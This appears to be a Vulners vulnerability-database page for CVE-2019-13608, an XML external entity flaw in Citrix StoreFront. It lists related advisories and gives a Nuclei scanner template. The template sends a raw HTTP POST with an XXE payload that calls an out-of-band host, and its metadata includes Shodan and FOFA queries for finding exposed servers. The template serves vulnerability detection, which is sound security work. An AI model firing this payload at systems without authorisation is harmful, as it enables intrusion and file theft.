| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| CVE-2019-13608 | 29 Aug 201900:00 | – | attackerkb | |
| The vulnerability of the corporate application store server, Citrix StoreFront, allows attackers to perform XXE attacks. | 18 Nov 202100:00 | – | bdu_fstec | |
| CVE-2019-13608 | 1 Feb 202114:56 | – | circl | |
| Citrix StoreFront Server XML External Entity (XXE) Processing Vulnerability | 3 Nov 202100:00 | – | cisa_kev | |
| Citrix StoreFront Server XXE (CTX477616) | 2 Jun 202300:00 | – | nessus | |
| Citrix Systems StoreFront Server XML External Entity Injection Vulnerability | 29 Aug 201900:00 | – | cnvd | |
| Citrix StoreFront Server XML External Entity Injection (CVE-2019-13608) | 7 Nov 201900:00 | – | checkpoint_advisories | |
| CVE-2019-13608 - XML External Entity (XXE) Processing Vulnerability in Citrix StoreFront Server | 20 Aug 201904:00 | – | citrix | |
| CVE-2019-13608 | 29 Aug 201918:33 | – | cve | |
| CVE-2019-13608 | 29 Aug 201918:33 | – | cvelist |
id: CVE-2019-13608
info:
name: Citrix StoreFront Server - XML External Entity
author: daffainfo
severity: high
description: |
Citrix StoreFront Server before 1903, 7.15 LTSR before CU4 (3.12.4000), and 7.6 LTSR before CU8 (3.0.8000) allows XXE attacks.
impact: |
Attackers can read arbitrary files, perform server-side request forgery, or cause denial of service through XXE attacks.
remediation: |
Update to version 1903 or later for StoreFront, CU4 or later for 7.15 LTSR, CU8 or later for 7.6 LTSR.
reference:
- https://www.exploit-db.com/exploits/47561
- https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX251988
- https://nvd.nist.gov/vuln/detail/CVE-2019-13608
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-13608
cwe-id: CWE-611
epss-score: 0.3026
epss-percentile: 0.97999
cpe: cpe:2.3:a:citrix:storefront_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: citrix
product: storefront_server
shodan-query: "/Citrix/StoreWeb"
fofa-query: "/Citrix/StoreWeb"
tags: cve,cve2019,citrix,storefront_server,xxe,kev,vkev
http:
- raw:
- |
POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1
Host: {{Hostname}}
Content-Type: application/vnd.citrix.requesttoken+xml
Accept: application/vnd.citrix.requesttokenresponse+xml, text/xml, application/vnd.citrix.authenticateresponse-1+xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE requesttoken [<!ENTITY % xxe SYSTEM "http://{{interactsh-url}}"> %xxe; ]>
<requesttoken xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken">
<for-service>6b78ab94-a709-4e3a-8b9b-a49ca317c70c</for-service>
<for-service-url>https://www.example.com/Citrix/Store/resources/v2</for-service-url>
<reqtokentemplate />
<requested-lifetime>1.00:00:00</requested-lifetime>
</requesttoken>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: content_type
words:
- "vnd.citrix.authenticateresponse"
- type: word
part: body
words:
- "<AuthenticateResponse"
- "error-bad-request"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022059a09e3cdb79c8372ef30c640625318e736828b7574941ec7d7e56b620543585022100fe2f5add2140c04d325c8d85438ac5f3039a1654c023d6b3482aa0b83a7e18ec:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation